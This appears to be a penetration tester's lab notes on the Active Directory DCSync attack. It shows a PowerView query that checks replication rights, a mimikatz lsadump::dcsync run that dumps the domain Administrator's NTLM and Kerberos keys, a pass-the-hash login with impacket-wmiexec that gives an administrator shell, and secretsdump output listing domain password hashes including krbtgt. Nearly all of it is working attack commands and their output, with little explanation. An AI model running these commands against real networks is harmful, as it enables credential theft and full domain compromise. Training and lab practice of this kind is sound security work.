How to identify if you have DCsync rights?
Tried the steps with PowerView from here https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/dcsync but not sure how should work. The output can be seen below. There is an Error followed by some output
PS C:\Tools> Get-ObjectAcl -DistinguishedName "dc=corp,dc=com" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}
ERROR
Exception calling "Substring" with "1" argument(s): "StartIndex cannot be less than zero. Parameter name: startIndex" At C:\Tools\PowerView.ps1:8167 char:25 + ... $IdentityDomain = $IdentityInstance.SubString($IdentityIn ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (:) [], MethodInvocationException + FullyQualifiedErrorId : ArgumentOutOfRangeException Get-DomainSearcher : Cannot validate argument on parameter 'Domain'. The argument is null or empty. Provide an argument that is not null or empty, and then try the command again. At C:\Tools\PowerView.ps1:8170 char:56 + ... $Searcher = Get-DomainSearcher @SearcherArguments + ~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidData: (:) [Get-DomainSearcher], ParameterBindingValidationException + FullyQualifiedErrorId : ParameterArgumentValidationError,Get-DomainSearcher
AceType : AccessAllowed ObjectDN : DC=corp,DC=com ActiveDirectoryRights : CreateChild, Self, WriteProperty, ExtendedRight, GenericRead, WriteDacl, WriteOwner OpaqueLength : 0 ObjectSID : S-1-5-21-1987370270-658905905-1781884369 InheritanceFlags : None BinaryLength : 36 IsInherited : False IsCallback : False PropagationFlags : None SecurityIdentifier : S-1-5-21-1987370270-658905905-1781884369-512 AccessMask : 917949 AuditFlags : None AceFlags : None AceQualifier : AccessAllowed AceType : AccessAllowed ObjectDN : DC=corp,DC=com ActiveDirectoryRights : GenericAll OpaqueLength : 0 ObjectSID : S-1-5-21-1987370270-658905905-1781884369 InheritanceFlags : ContainerInherit BinaryLength : 36 IsInherited : False IsCallback : False PropagationFlags : None SecurityIdentifier : S-1-5-21-1987370270-658905905-1781884369-519 AccessMask : 983551 AuditFlags : None AceFlags : ContainerInherit AceQualifier : AccessAllowed AceType : AccessAllowed ObjectDN : DC=corp,DC=com ActiveDirectoryRights : CreateChild, Self, WriteProperty, ExtendedRight, Delete, GenericRead, WriteDacl, WriteOwner OpaqueLength : 0 ObjectSID : S-1-5-21-1987370270-658905905-1781884369 InheritanceFlags : ContainerInherit BinaryLength : 24 IsInherited : False IsCallback : False PropagationFlags : None SecurityIdentifier : S-1-5-32-544 AccessMask : 983485 AuditFlags : None AceFlags : ContainerInherit AceQualifier : AccessAllowed AceType : AccessAllowed ObjectDN : DC=corp,DC=com ActiveDirectoryRights : GenericAll OpaqueLength : 0 ObjectSID : S-1-5-21-1987370270-658905905-1781884369 InheritanceFlags : None BinaryLength : 20 IsInherited : False IsCallback : False PropagationFlags : None SecurityIdentifier : S-1-5-18 AccessMask : 983551 AuditFlags : None AceFlags : None AceQualifier : AccessAllowed
{% code title="Using mimikatz to dump hashes" overflow="wrap" lineNumbers="true" %}
mimikatz # lsadump::dcsync /domain:corp.com /user:corp\Administrator [DC] 'corp.com' will be the domain [DC] 'DC1.corp.com' will be the DC server [DC] 'corp\Administrator' will be the user account [rpc] Service : ldap [rpc] AuthnSvc : GSS_NEGOTIATE (9) Object RDN : Administrator ** SAM ACCOUNT ** SAM Username : Administrator Account Type : 30000000 ( USER_OBJECT ) User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD ) Account expiration : Password last change : 8/16/2022 5:27:22 PM Object Security ID : S-1-5-21-1987370270-658905905-1781884369-500 Object Relative ID : 500 Credentials: Hash NTLM: 2892d26cdf84d7a70e2eb3b9f05c425e Supplemental Credentials: * Primary:NTLM-Strong-NTOWF * Random Value : 731b7c2aa33ef31284bed1e7895123de * Primary:Kerberos-Newer-Keys * Default Salt : WIN-D74CT1583SRAdministrator Default Iterations : 4096 Credentials aes256_hmac (4096) : 56136fd5bbd512b3670c581ff98144a553888909a7bf8f0fd4c424b0d42b0cdc aes128_hmac (4096) : 3d58eb136242c11643baf4ec85970250 des_cbc_md5 (4096) : fd79dc380ee989a4 OldCredentials aes256_hmac (4096) : aefc3b3587d7f6786dd4bd53647bc7ce09148c3556172fd86d2eb24a59924248 aes128_hmac (4096) : bae2ca0a0a705c2b965e10321860f4ca des_cbc_md5 (4096) : 0e7c641c573ddac2 * Packages * NTLM-Strong-NTOWF * Primary:Kerberos * Default Salt : WIN-D74CT1583SRAdministrator Credentials des_cbc_md5 : fd79dc380ee989a4 OldCredentials des_cbc_md5 : 0e7c641c573ddac2 mimikatz #
{% endcode %}
Using the same technique from PTH and with the hash found above
{% code title="Log in with the PTH tecnnic" overflow="wrap" lineNumbers="true" %}
/usr/bin/impacket-wmiexec -hashes :2892d26cdf84d7a70e2eb3b9f05c425e [email protected]
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
corp\administrator
C:\>ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::3c34:78c3:e3d9:1a1d%14
IPv4 Address. . . . . . . . . . . : 192.168.235.70
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.235.254
{% endcode %}
secretsdump.py htb/[email protected]
Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::